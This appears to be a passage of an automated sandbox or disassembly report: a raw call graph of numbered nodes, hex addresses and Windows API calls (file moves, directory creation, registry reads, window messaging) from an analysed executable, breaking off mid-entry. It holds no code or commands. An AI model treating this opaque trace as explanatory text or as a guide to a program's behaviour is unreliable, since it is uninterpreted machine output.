49133->49239 49134->49096 49236 407d60 7 API calls 49135->49236 49137 485876 49138 42e5d8 5 API calls 49137->49138 49139 48587e 49138->49139 49240 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49139->49240 49142 48580d 49143 44634c 18 API calls 49142->49143 49144 485821 49143->49144 49237 40848c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49144->49237 49146 48582c 49238 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49146->49238 49148 485838 49150 446354 49149->49150 49241 4353ec 49150->49241 49152 446373 49153 42c518 49152->49153 49267 42c8c8 7 API calls 49153->49267 49155 42c53e 49268 42c8c8 7 API calls 49155->49268 49157 42c54c 49269 406ac4 49157->49269 49159 42c555 49160 403438 4 API calls 49159->49160 49161 42c571 49160->49161 49161->49089 49161->49090 49163 450788 2 API calls 49162->49163 49165 450c65 49163->49165 49164 450c69 49164->49107 49165->49164 49166 450c8d MoveFileA GetLastError 49165->49166 49167 4507c4 Wow64RevertWow64FsRedirection 49166->49167 49168 450cb3 49167->49168 49168->49107 49169->49096 49171 406b43 49170->49171 49172 406b65 49171->49172 49173 406b5c 49171->49173 49176 403790 4 API calls 49172->49176 49174 403418 4 API calls 49173->49174 49175 406b63 49174->49175 49177 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49175->49177 49176->49175 49177->49096 49178->48984 49179->49096 49180->48991 49181->49096 49182->48994 49183->49096 49185 403750 49184->49185 49186 407236 SetCurrentDirectoryA 49185->49186 49186->49003 49187->49096 49188->49096 49189->49017 49190->49096 49191->49030 49192->49096 49193->49096 49194->49040 49195->49096 49272 42c728 49196->49272 49199 42c7e1 49202 403790 4 API calls 49199->49202 49200 42c7d8 49201 403418 4 API calls 49200->49201 49203 42c7df 49201->49203 49202->49203 49204 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49203->49204 49204->49096 49205->49096 49207 42c664 IsDBCSLeadByte 49206->49207 49208 42c82c 49207->49208 49209 403790 4 API calls 49208->49209 49210 42c83d 49209->49210 49211 4466a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49210->49211 49211->49096 49212->49072 49213->49096 49214->49084 49215->49096 49216->49096 49217->49096 49218->49097 49219->49106 49221 450788 2 API calls 49220->49221 49222 4507ea 49221->49222 49223 4507ee 49222->49223 49224 45080c CreateDirectoryA GetLastError 49222->49224 49223->49108 49225 4507c4 Wow64RevertWow64FsRedirection 49224->49225 49226 450832 49225->49226 49226->49108 49227->49096 49228->49117 49229->49096 49231 4465d4 49230->49231 49279 435754 VariantClear 49231->49279 49233 44660e 49233->49096 49234 4465f7 49234->49233 49280 408b90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49234->49280 49236->49142 49237->49146 49238->49148 49239->49137 49240->49096 49242 4353f8 49241->49242 49243 43541a 49241->49243 49242->49243 49261 408b90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49242->49261 49244 43549d 49243->49244 49245 435461 49243->49245 49246 435491 49243->49246 49247 435485 49243->49247 49248 435479 49243->49248 49249 43546d 49243->49249 49266 408b90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49244->49266 49262 403528 49245->49262 49265 404100 18 API calls 49246->49265 49256 4034ac 4 API calls 49247->49256 49248->49152 49255 403528 4 API calls 49249->49255 49254 4354ae 49254->49152 49259 435476 49255->49259 49260 43548e 49256->49260 49257 43549a 49257->49152 49259->49152 49260->49152 49261->49243 49263 4034f8 4 API calls 49262->49263 49264 403535 49263->49264 49264->49152 49265->49257 49266->49254 49267->49155 49268->49157 49270 406ad1 49269->49270 49271 406ae9 CompareStringA 49270->49271 49271->49159 49273 42c737 49272->49273 49274 42c664 IsDBCSLeadByte 49273->49274 49277 42c742 49274->49277 49275 42c764 49275->49199 49275->49200 49277->49275 49278 42c3b8 IsDBCSLeadByte 49277->49278 49278->49277 49279->49234 49280->49233 49281 41fad0 49282 41fad9 49281->49282 49285 41fd74 49282->49285 49284 41fae6 49286 41fe66 49285->49286 49287 41fd8b 49285->49287 49286->49284 49287->49286 49306 41f934 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49287->49306 49289 41fdc1 49290 41fdc5 49289->49290 49291 41fdeb 49289->49291 49307 41fb14 49290->49307 49316 41f934 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49291->49316 49294 41fdf9 49296 41fe23 49294->49296 49297 41fdfd 49294->49297 49301 41fb14 10 API calls 49296->49301 49300 41fb14 10 API calls 49297->49300 49298 41fb14 10 API calls 49299 41fde9 49298->49299 49299->49284 49302 41fe0f 49300->49302 49303 41fe35 49301->49303 49304 41fb14 10 API calls 49302->49304 49305 41fb14 10 API calls 49303->49305 49304->49299 49305->49299 49306->49289 49308 41fb2f 49307->49308 49309 41fb45 49308->49309 49310 41f8b4 4 API calls 49308->49310 49317 41f8b4 49309->49317 49310->49309 49312 41fb8d 49313 41fbb0 SetScrollInfo 49312->49313 49325 41fa14 49313->49325 49316->49294 49336 418158 49317->49336 49319 41f8d1 GetWindowLongA 49320 41f90e 49319->49320 49321 41f8ee 49319->49321 49339 41f840 GetWindowLongA GetSystemMetrics GetSystemMetrics 49320->49339 49338 41f840 GetWindowLongA GetSystemMetrics GetSystemMetrics 49321->49338 49324 41f8fa 49324->49312 49326 41fa22 49325->49326 49327 41fa2a 49325->49327 49326->49298 49328 41fa69 49327->49328 49329 41fa59 49327->49329 49335 41fa67 49327->49335 49341 417dc0 IsWindowVisible ScrollWindow SetWindowPos 49328->49341 49340 417dc0 IsWindowVisible ScrollWindow SetWindowPos 49329->49340 49330 41faa9 GetScrollPos 49330->49326 49333 41fab4 49330->49333 49334 41fac3 SetScrollPos 49333->49334 49334->49326 49335->49330 49337 418162 49336->49337 49337->49319 49338->49324 49339->49324 49340->49335 49341->49335 53450 475c76 53451 44fb9c 28 API calls 53450->53451 53452 475c8a 53451->53452 53453 474be8 26 API calls 53452->53453 53454 475cae 53453->53454 53455 42e1b3 SetErrorMode 49342 420510 49343 420523 49342->49343 49363 415aa8 49343->49363 49345 42066a 49346 420681 49345->49346 49370 41464c KiUserCallbackDispatcher 49345->49370 49348 420698 49346->49348 49371 414690 KiUserCallbackDispatcher 49346->49371 49353 4206ba 49348->49353 49372 41ffd8 12 API calls 49348->49372 49349 42055e 49349->49345 49350 4205c9 49349->49350 49356 4205ba MulDiv 49349->49356 49368 4207c0 20 API calls 49350->49368 49354 4205e2 49354->49345 49369 41ffd8 12 API calls 49354->49369 49367 41a27c LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 49356->49367 49359 4205ff 49360 42061b MulDiv 49359->49360 49361 42063e 49359->49361 49360->49361 49361->49345 49362 420647 MulDiv 49361->49362 49362->49345 49364 415aba 49363->49364 49373 4143e8 49364->49373 49366 415ad2 49366->49349 49367->49350 49368->49354 49369->49359 49370->49346 49371->49348 49372->49353 49374 414402 49373->49374 49377 4105c0 49374->49377 49376 414418 49376->49366 49380 40de0c 49377->49380 49379 4105c6 49379->49376 49381 40de6e 49380->49381 49382 40de1f 49380->49382 49387 40de7c 49381->49387 49385 40de7c 19 API calls 49382->49385 49386 40de49 49385->49386 49386->49379 49388 40de8c 49387->49388 49390 40dea2 49388->49390 49399 40d748 49388->49399 49419 40e204 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49388->49419 49402 40e0b4 49390->49402 49393 40d748 5 API calls 49394 40deaa 49393->49394 49394->49393 49395 40df16 49394->49395 49405 40dcc8 49394->49405 49397 40e0b4 5 API calls 49395->49397 49398 40de78 49397->49398 49398->49379 49400 40eb70 5 API calls 49399->49400 49401 40d752 49400->49401 49401->49388 49420 40d624 49402->49420 49406 40e0bc 5 API calls 49405->49406 49407 40dcfb 49406->49407 49408 40ead4 5 API calls 49407->49408 49409 40dd06 49408->49409 49410 40ead4 5 API calls 49409->49410 49411 40dd11 49410->49411 49412 40dd23 49411->49412 49413 40dd2c 49411->49413 49418 40dd29 49411->49418 49432 40dc30 19 API calls 49412->49432 49429 40db40 49413->49429 49416 403438 4 API calls 49417 40ddf7 49416->49417 49417->49394 49418->49416 49419->49388 49421 40eb70 5 API calls 49420->49421 49422 40d631 49421->49422 49423 40d644 49422->49423 49427 40ec74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49422->49427 49423->49394 49425 40d63f 49428 40d5c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49425->49428 49427->49425 49428->49423 49433 40ace4 19 API calls 49429->49433 49431 40db68 49431->49418 49432->49418 49433->49431 49434 477e94 49505 46556c 49434->49505 49437 477ee0 49439 414a60 4 API calls 49437->49439 49440 477ef0 49439->49440 49441 403468 4 API calls 49440->49441 49442 477efd 49441->49442 49508 4657d4 49442->49508 49445 477f0d 49446 414a60 4 API calls 49445->49446 49448 477f1d 49446->49448 49449 403468 4 API calls 49448->49449 49450 477f2a 49449->49450 49537 4633fc 49450->49537 49452 477f43 49453 477f81 49452->49453 49694 46fd48 23 API calls 49452->49694 49455 424154 11 API calls 49453->49455 49456 477f8b 49455->49456 49457 477fb1 49456->49457 49458 477f9c SetActiveWindow 49456->49458 49543 47756c 49457->49543 49458->49457 49700 46558c 49505->49700 49509 4657fd 49508->49509 49510 414a60 4 API calls 49509->49510 49530 46584a 49509->49530 49511 465813 49510->49511 49792 460620 6 API calls 49511->49792 49512 403438 4 API calls 49514 4658f4 49512->49514 49514->49445 49693 408b64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49514->49693 49515 46581b 49516 414a90 4 API calls 49515->49516 49517 465829 49516->49517 49518 465836 49517->49518 49521 46584f 49517->49521 49793 47435c 39 API calls 49518->49793 49520 465867 49795 47435c 39 API calls 49520->49795 49521->49520 49794 460704 CharNextA 49521->49794 49524 465863 49524->49520 49525 46587d 49524->49525 49526 465883 49525->49526 49527 465899 49525->49527 49796 47435c 39 API calls 49526->49796 49797 42c864 CharNextA 49527->49797 49530->49512 49531 4658a6 49531->49530 49798 460790 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49531->49798 49533 4658bd 49534 44ffc8 4 API calls 49533->49534 49535 4658ca 49534->49535 49799 47435c 39 API calls 49535->49799 49800 429fb8 SendMessageA 49537->49800 49539 46340b 49540 46342b 49539->49540 49801 429fb8 SendMessageA 49539->49801 49540->49452 49542 46341b 49542->49452 49544 4775bd 49543->49544 49545 47758f 49543->49545 49547 46d39c 49544->49547 49802 488364 18 API calls 49545->49802 49548 454e8c 25 API calls 49547->49548 49549 46d3e8 49548->49549 49550 40722c SetCurrentDirectoryA 49549->49550 49551 46d3f2 49550->49551 49803 466ec4 49551->49803 49556 471e10 34 API calls 49557 46d446 49556->49557 49559 46d456 49557->49559 50180 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49557->50180 49560 46d46d 49559->49560 50181 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49559->50181 49562 46eee4 20 API calls 49560->49562 49563 46d478 49562->49563 49564 403468 4 API calls 49563->49564 49565 46d495 49564->49565 49566 403468 4 API calls 49565->49566 49567 46d4a3 49566->49567 49813 4674a8 49567->49813 49571 46d4f7 49849 46d2f4 49571->49849 49578 467034 17 API calls 49579 46d51b 49578->49579 49865 46c710 49579->49865 49582 467034 17 API calls 49583 46d525 49582->49583 49584 46d549 49583->49584 49585 456fec 4 API calls 49583->49585 49586 46d56a 49584->49586 49587 456fec 4 API calls 49584->49587 49585->49584 49878 46c808 49586->49878 49587->49586 49590 467034 17 API calls 49591 46d576 49590->49591 49889 466e98 49591->49889 49596 467034 17 API calls 49597 46d58c 49596->49597 49598 46d5a5 49597->49598 49600 466e98 10 API calls 49597->49600 49599 466e98 10 API calls 49598->49599 49602 46d59f 49600->49602 49910 46cd48 49602->49910 49692 408b64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49694->49453 49701 414a60 4 API calls 49700->49701 49702 4655be 49701->49702 49750 460594 49702->49750 49705 414a90 4 API calls 49706 4655d0 49705->49706 49707 4655df 49706->49707 49709 4655f8 49706->49709 49759 47435c 39 API calls 49707->49759 49712 46563f 49709->49712 49713 465626 49709->49713 49710 403438 4 API calls 49711 46558b 49710->49711 49711->49437 49711->49692 49714 46569c 49712->49714 49727 465643 49712->49727 49760 47435c 39 API calls 49713->49760 49762 42ca04 CharNextA 49714->49762 49717 4656ab 49718 4656af 49717->49718 49721 4656c8 49717->49721 49763 47435c 39 API calls 49718->49763 49720 465683 49761 47435c 39 API calls 49720->49761 49722 4656ec 49721->49722 49764 460704 CharNextA 49721->49764 49766 47435c 39 API calls 49722->49766 49726 4656dc 49726->49722 49765 460734 CharNextA 49726->49765 49727->49720 49727->49721 49729 4656e8 49729->49722 49730 465705 49729->49730 49731 403790 4 API calls 49730->49731 49732 46571b 49731->49732 49767 42c864 CharNextA 49732->49767 49734 465728 49735 46572c 49734->49735 49736 46575a 49734->49736 49768 460790 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49735->49768 49770 42c794 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49736->49770 49739 46573f 49741 44ffc8 4 API calls 49739->49741 49740 465765 49742 42c374 5 API calls 49740->49742 49743 46574c 49741->49743 49744 465770 49742->49744 49769 47435c 39 API calls 49743->49769 49771 42cbfc 49744->49771 49747 4655f3 49747->49710 49755 4605ae 49750->49755 49751 406b34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49751->49755 49753 42ca74 6 API calls 49753->49755 49754 403468 4 API calls 49754->49755 49755->49751 49755->49753 49755->49754 49756 4605f7 49755->49756 49775 42c974 49755->49775 49757 403438 4 API calls 49756->49757 49758 460611 49757->49758 49758->49705 49759->49747 49760->49747 49761->49747 49762->49717 49763->49747 49764->49726 49765->49729 49766->49747 49767->49734 49768->49739 49769->49747 49770->49740 49786 42cb80 49771->49786 49774 47435c 39 API calls 49774->49747 49776 4034ac 4 API calls 49775->49776 49777 42c984 49776->49777 49778 40375c 4 API calls 49777->49778 49781 42c9ba 49777->49781 49784 42c3b8 IsDBCSLeadByte 49777->49784 49778->49777 49780 42c9fe 49780->49755 49781->49780 49783 4037d0 4 API calls 49781->49783 49785 42c3b8 IsDBCSLeadByte 49781->49785 49783->49781 49784->49777 49785->49781 49787 42ca74 6 API calls 49786->49787 49788 42cba2 49787->49788 49789 42cbaa GetFileAttributesA 49788->49789 49790 403418 4 API calls 49789->49790 49791 42cbc7 49790->49791 49791->49747 49791->49774 49792->49515 49793->49530 49794->49524 49795->49530 49796->49530 49797->49531 49798->49533 49799->49530 49800->49539 49801->49542 49802->49544 49808 466eeb 49803->49808 49804 466f68 50188 44eb38 49804->50188 49805 46f694 19 API calls 49805->49808 49808->49804 49808->49805 49809 456f28 49810 456f2e 49809->49810 49811 4571b8 4 API calls 49810->49811 49812 456f4a 49811->49812 49812->49556 49814 4674e6 49813->49814 49815 4674d6 49813->49815 49817 403418 4 API calls 49814->49817 49816 4034ac 4 API calls 49815->49816 49818 4674e4 49816->49818 49817->49818 49819 4531f4 5 API calls 49818->49819 49820 4674fa 49819->49820 49821 453230 5 API calls 49820->49821 49822 467508 49821->49822 49823 467480 5 API calls 49822->49823 49824 46751c 49823->49824 49825 456fec 4 API calls 49824->49825 49826 467534 49825->49826 49827 403438 4 API calls 49826->49827 49828 46754e 49827->49828 49829 403418 4 API calls 49828->49829 49830 467556 49829->49830 49831 467568 49830->49831 49832 4034f8 4 API calls 49831->49832 49833 46759f 49832->49833 49834 4675b7 49833->49834 49835 4675a8 49833->49835 49837 403418 4 API calls 49834->49837 49836 471e10 34 API calls 49835->49836 49838 4675b5 49836->49838 49837->49838 49839 471e10 34 API calls 49838->49839 49840 4675da 49839->49840 49841 471e10 34 API calls 49840->49841 49842 46762c 49841->49842 49843 456fec 4 API calls 49842->49843 49844 467644 49843->49844 49845 403418 4 API calls 49844->49845 49846 467659 49845->49846 49847 403438 4 API calls 49846->49847 49848 467666 49847->49848 49848->49571 49850 46d335 49849->49850 49851 46d304 49849->49851 49853 467034 49850->49853 49851->49850 49852 46f554 19 API calls 49851->49852 49852->49851 49854 467042 49853->49854 49855 46703d 49853->49855 50197 424424 49854->50197 50201 408b64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49855->50201 49859 46705a 49861 46d348 49859->49861 49862 46d38b 49861->49862 49863 46d358 49861->49863 49862->49578 49863->49862 49864 46f554 19 API calls 49863->49864 49864->49863 49866 46c7e5 49865->49866 49872 46c737 49865->49872 49867 403418 4 API calls 49866->49867 49868 46c7fa 49867->49868 49868->49582 49869 46f554 19 API calls 49869->49872 49872->49866 49872->49869 49873 46c787 49872->49873 50235 4735d0 49872->50235 50239 46f1e8 49872->50239 50244 46f214 19 API calls 49872->50244 49873->49872 49874 471e10 34 API calls 49873->49874 50242 451ed4 20 API calls 49873->50242 50243 451ed4 20 API calls 49873->50243 49874->49873 49879 46c8c7 49878->49879 49887 46c836 49878->49887 49880 403418 4 API calls 49879->49880 49881 46c8dc 49880->49881 49881->49590 49882 46f554 19 API calls 49882->49887 49883 4735d0 15 API calls 49883->49887 49884 46f1e8 19 API calls 49884->49887 49885 471e10 34 API calls 49885->49887 49886 456fec 4 API calls 49886->49887 49887->49879 49887->49882 49887->49883 49887->49884 49887->49885 49887->49886 50254 46f214 19 API calls 49887->50254 49890 414a90 4 API calls 49889->49890 49891 466eaa 49890->49891 50255 466e20 49891->50255 49894 46842c 50288 46812c 49894->50288 49896 468547 49897 403438 4 API calls 49896->49897 49898 468561 49897->49898 49898->49596 49899 468460 49899->49896 49900 46f554 19 API calls 49899->49900 49901 4735d0 15 API calls 49899->49901 49902 46f1e8 19 API calls 49899->49902 49903 471e10 34 API calls 49899->49903 49904 42c6cc 5 API calls 49899->49904 49905 42ca74 6 API calls 49899->49905 49906 46812c 38 API calls 49899->49906 50332 467394 7 API calls 49899->50332 50333 468360 64 API calls 49899->50333 50334 46f214 19 API calls 49899->50334 49900->49899 49901->49899 49902->49899 49903->49899 49904->49899 49905->49899 49906->49899 50180->49559 50181->49560 50191 44eb4c 50188->50191 50192 44eb5d 50191->50192 50193 44eb7e MulDiv 50192->50193 50194 44eb49 50192->50194 50195 418158 50193->50195 50194->49809 50196 44eba9 SendMessageA 50195->50196 50196->50194 50198 424427 50197->50198 50200 424432 50198->50200 50203 424374 PeekMessageA 50198->50203 50200->49859 50202 408b64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50200->50202 50204 424418 50203->50204 50205 424397 50203->50205 50204->50198 50205->50204 50215 424344 50205->50215 50214 424402 TranslateMessage DispatchMessageA 50214->50204 50216 424355 50215->50216 50217 42436c 50215->50217 50216->50217 50234 424c30 UnhookWindowsHookEx TerminateThread KillTimer IsWindowVisible ShowWindow 50216->50234 50217->50204 50219 424290 50217->50219 50220 4242a0 50219->50220 50221 4242da 50219->50221 50220->50221 50222 4242c7 TranslateMDISysAccel 50220->50222 50221->50204 50223 4242e0 50221->50223 50222->50221 50224 4242f5 50223->50224 50225 42433c 50223->50225 50224->50225 50226 4242fd GetCapture 50224->50226 50225->50204 50231 42426c 50225->50231 50226->50225 50227 424306 50226->50227 50228 42431f SendMessageA 50227->50228 50229 424318 50227->50229 50228->50225 50230 42433a 50228->50230 50229->50228 50230->50225 50232 42427f IsDialogMessage 50231->50232 50233 42428c 50231->50233 50232->50233 50233->50204 50233->50214 50234->50217 50236 473677 50235->50236 50237 4735e4 50235->50237 50236->49872 50237->50236 50245 454718 15 API calls 50237->50245 50246 46f144 50239->50246 50242->49873 50243->49872 50244->49872 50245->50236 50247 46f150 50246->50247 50251 46f178 50246->50251 50248 46f171 50247->50248 50252 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50247->50252 50253 46f004 19 API calls 50248->50253 50251->49872 50252->50248 50253->50251 50254->49887 50262 42e6f8 73A1A570 50255->50262 50257 466e56 50258 414a90 4 API calls 50257->50258 50259 466e60 50258->50259 50260 403418 4 API calls 50259->50260 50261 466e89 50260->50261 50261->49894 50263 41a160 5 API calls 50262->50263 50264 42e740 SelectObject 50263->50264 50265 4034ac 4 API calls 50264->50265 50266 42e753 50265->50266 50267 42c81c 5 API calls 50266->50267 50268 42e75d 50267->50268 50269 42c7f4 5 API calls 50268->50269 50270 42e767 50269->50270 50283 42c584 50270->50283 50272 42e76f 50273 403790 4 API calls 50272->50273 50274 42e79f 50273->50274 50275 4037d0 4 API calls 50274->50275 50279 42e7ae 50275->50279 50276 42e810 73A1A480 50276->50257 50279->50276 50280 40364c 4 API calls 50279->50280 50281 403418 4 API calls 50279->50281 50282 4034ac 4 API calls 50279->50282 50286 42e644 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50279->50286 50287 42e3dc 6 API calls 50279->50287 50280->50279 50281->50279 50282->50279 50284 42c58c IsDBCSLeadByte 50283->50284 50285 42c58b 50284->50285 50285->50272 50286->50279 50287->50279 50289 468153 50288->50289 50290 42c6cc 5 API calls 50289->50290 50291 468170 50290->50291 50292 42ca74 6 API calls 50291->50292 50293 46817b 50292->50293 50294 4034ac 4 API calls 50293->50294 50295 468186 50294->50295 50296 42c7f4 5 API calls 50295->50296 50297 468191 50296->50297 50298 4682b0 50297->50298 50335 45094c 50297->50335 50299 403438 4 API calls 50298->50299 50301 468313 50299->50301 50303 403438 4 API calls 50301->50303 50302 4681a5 50305 42c76c 5 API calls 50302->50305 50311 4681a9 50302->50311 50304 468320 50303->50304 50306 403418 4 API calls 50304->50306 50307 4681c7 50305->50307 50309 468328 50306->50309 50308 46812c 35 API calls 50307->50308 50310 4681de 50308->50310 50309->49899 50312 45507c 25 API calls 50310->50312 50311->50298 50314 456fec 4 API calls 50311->50314 50313 4681f8 50312->50313 50315 4507d4 5 API calls 50313->50315 50314->50298 50316 468202 50315->50316 50317 468206 GetLastError 50316->50317 50319 468262 50316->50319 50318 44ffc8 4 API calls 50317->50318 50320 46821e 50318->50320 50319->50311 50321 46827b SHChangeNotify 50319->50321 50323 42c76c 5 API calls 50321->50323 50332->49899 50333->49899 50334->49899 50336 450788 2 API calls 50335->50336 50338 450962 50336->50338 50337 450966 50337->50302 50338->50337 50339 42cbfc 7 API calls 50338->50339 50340 450981 GetLastError 50339->50340 50341 4507c4 Wow64RevertWow64FsRedirection 50340->50341 50342 4509a1 50341->50342 50342->50302 53456 4145f4 KiUserCallbackDispatcher 53457 4135b4 SetWindowLongA GetWindowLongA 53458 413611 SetPropA SetPropA 53457->53458 53459 4135f3 GetWindowLongA 53457->53459 53463 41f314 53458->53463 53459->53458 53460 413602 SetWindowLongA 53459->53460 53460->53458 53468 423b84 53463->53468 53562 4239fc 53463->53562 53569 4151e8 53463->53569 53464 413661 53471 423bba 53468->53471 53487 423bdb 53471->53487 53576 423ae0 53471->53576 53472 423c64 53474 423c6b 53472->53474 53475 423c9f 53472->53475 53473 423c05 53476 423c0b 53473->53476 53477 423cc8 53473->53477 53482 423c71 53474->53482 53518 423f29 53474->53518 53478 424012 IsIconic 53475->53478 53479 423caa 53475->53479 53483 423c10 53476->53483 53484 423c3d 53476->53484 53480 423ce3 53477->53480 53481 423cda 53477->53481 53478->53487 53491 424026 GetFocus 53478->53491 53485 423cb3 53479->53485 53486 42404e 53479->53486 53582 42410c 11 API calls 53480->53582 53488 423cf0 53481->53488 53489 423ce1 53481->53489 53492 423e8b SendMessageA 53482->53492 53493 423c7f 53482->53493 53494 423c16 53483->53494 53495 423d6e 53483->53495 53484->53487 53508 423c56 53484->53508 53509 423db7 53484->53509 53500 424065 53485->53500 53520 423c38 53485->53520 53598 4247c8 WinHelpA PostMessageA 53486->53598 53487->53464 53501 424154 11 API calls 53488->53501 53583 423afc NtdllDefWindowProc_A 53489->53583 53491->53487 53502 424037 53491->53502 53492->53487 53493->53487 53493->53520 53545 423ece 53493->53545 53496 423d96 PostMessageA 53494->53496 53497 423c1f 53494->53497 53587 423afc NtdllDefWindowProc_A 53495->53587 53588 423afc NtdllDefWindowProc_A 53496->53588 53503 423c28 53497->53503 53504 423e1d 53497->53504 53506 424083 53500->53506 53507 42406e 53500->53507 53501->53487 53597 41ef6c GetCurrentThreadId 73A25940 53502->53597 53513 423c31 53503->53513 53514 423d46 IsIconic 53503->53514 53515 423e26 53504->53515 53516 423e57 53504->53516 53505 423db1 53505->53487 53599 4244a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53506->53599 53517 42444c 5 API calls 53507->53517 53519 423d83 53508->53519 53508->53520 53580 423afc NtdllDefWindowProc_A 53509->53580 53513->53520 53525 423d09 53513->53525 53527 423d62 53514->53527 53528 423d56 53514->53528 53590 423a8c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53515->53590 53593 423afc NtdllDefWindowProc_A 53516->53593 53517->53487 53518->53487 53534 423f4f IsWindowEnabled 53518->53534 53531 4240f0 12 API calls 53519->53531 53520->53487 53581 423afc NtdllDefWindowProc_A 53520->53581 53523 42403e 53523->53487 53524 424046 SetFocus 53523->53524 53524->53487 53525->53487 53584 422bc4 ShowWindow PostMessageA PostQuitMessage 53525->53584 53586 423afc NtdllDefWindowProc_A 53527->53586 53585 423b38 15 API calls 53528->53585 53531->53487 53532 423dbd 53538 423dfb 53532->53538 53539 423dd9 53532->53539 53533 423e2e 53542 423e40 53533->53542 53591 41eed0 6 API calls 53533->53591 53534->53487 53543 423f5d 53534->53543 53537 423e5d 53544 423e75 53537->53544 53550 41ee1c 2 API calls 53537->53550 53540 4239fc 6 API calls 53538->53540 53589 423a8c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53539->53589 53547 423e03 PostMessageA 53540->53547 53592 423afc NtdllDefWindowProc_A 53542->53592 53555 423f64 IsWindowVisible 53543->53555 53551 4239fc 6 API calls 53544->53551 53545->53487 53552 423ef0 IsWindowEnabled 53545->53552 53547->53487 53550->53544 53551->53487 53552->53487 53554 423efe 53552->53554 53553 423de1 PostMessageA 53553->53487 53594 412288 7 API calls 53554->53594 53555->53487 53557 423f72 GetFocus 53555->53557 53558 418158 53557->53558 53559 423f87 SetFocus 53558->53559 53595 4151b8 53559->53595 53563 423a85 53562->53563 53564 423a0c 53562->53564 53563->53464 53564->53563 53565 423a12 EnumWindows 53564->53565 53565->53563 53566 423a2e GetWindow GetWindowLongA 53565->53566 53600 423994 GetWindow 53565->53600 53567 423a4d 53566->53567 53567->53563 53568 423a79 SetWindowPos 53567->53568 53568->53563 53568->53567 53570 4151f5 53569->53570 53571 415250 53570->53571 53572 41525b 53570->53572 53575 415259 53570->53575 53571->53575 53604 414fd4 46 API calls 53571->53604 53603 424b04 13 API calls 53572->53603 53575->53464 53577 423af5 53576->53577 53578 423aea 53576->53578 53577->53472 53577->53473 53578->53577 53579 4086a4 7 API calls 53578->53579 53579->53577 53580->53532 53581->53487 53582->53487 53583->53487 53584->53487 53585->53487 53586->53487 53587->53487 53588->53505 53589->53553 53590->53533 53591->53542 53592->53487 53593->53537 53594->53487 53596 4151d3 SetFocus 53595->53596 53596->53487 53597->53523 53598->53505 53599->53505 53601 4239c1 53600->53601 53602 4239b5 GetWindowLongA 53600->53602 53602->53601 53603->53575 53604->53575 51284 463a10 51285 463a37 51284->51285 51304 473458 51285->51304 51287 463a49 51288 4604fc 19 API calls 51287->51288 51303 463aa7 51287->51303 51290 463a57 51288->51290 51289 403418 4 API calls 51291 463ad8 51289->51291 51292 403594 4 API calls 51290->51292 51293 463a64 51292->51293 51294 403594 4 API calls 51293->51294 51295 463a71 51294->51295 51296 403594 4 API calls 51295->51296 51297 463a7e 51296->51297 51298 403594 4 API calls 51297->51298 51299 463a8c 51298->51299 51300 414a90 4 API calls 51299->51300 51301 463a9a 51300->51301 51302 460834 9 API calls 51301->51302 51302->51303 51303->51289 51305 473486 51304->51305 51309 4734bc 51304->51309 51321 4539c8 51305->51321 51306 403438 4 API calls 51307 4735bd 51306->51307 51307->51287 51309->51306 51310 473586 51310->51287 51311 46f694 19 API calls 51312 4734b0 51311->51312 51312->51309 51312->51310 51312->51311 51313 471e10 34 API calls 51312->51313 51319 473534 51312->51319 51328 473018 33 API calls 51312->51328 51313->51312 51314 471e10 34 API calls 51314->51319 51316 42c7f4 5 API calls 51316->51319 51317 42c81c 5 API calls 51317->51319 51319->51312 51319->51314 51319->51316 51319->51317 51320 473573 51319->51320 51329 473164 53 API calls 51319->51329 51320->51309 51322 4539d9 51321->51322 51323 4539e6 51322->51323 51324 4539dd 51322->51324 51338 4537ac 31 API calls 51323->51338 51330 4536cc 51324->51330 51327 4539e3 51327->51312 51328->51312 51329->51319 51331 42dbbc RegOpenKeyExA 51330->51331 51332 4536e9 51331->51332 51333 453737 51332->51333 51339 453600 51332->51339 51333->51327 51336 453600 6 API calls 51337 453718 RegCloseKey 51336->51337 51337->51327 51338->51327 51340 42daf8 6 API calls 51339->51340 51343 453628 51340->51343 51341 403438 4 API calls 51342 4536b2 51341->51342 51342->51336 51343->51341 51344 475d10 51345 475d19 51344->51345 51347 475d44 51344->51347 51345->51347 51350 475d36 51345->51350 51346 475d7d 51348 475d92 51346->51348 51349 475db0 51346->51349 51347->51346 51674 474530 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51347->51674 51352 475da7 51348->51352 51676 4746fc 39 API calls 51348->51676 51436 474480 51349->51436 51672 46e004 160 API calls 51350->51672 51358 474480 25 API calls 51352->51358 51355 475d73 51675 4746fc 39 API calls 51355->51675 51357 475d3b 51357->51347 51673 408b64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51357->51673 51359 475dae 51358->51359 51439 472118 51359->51439 51368 475dd6 51370 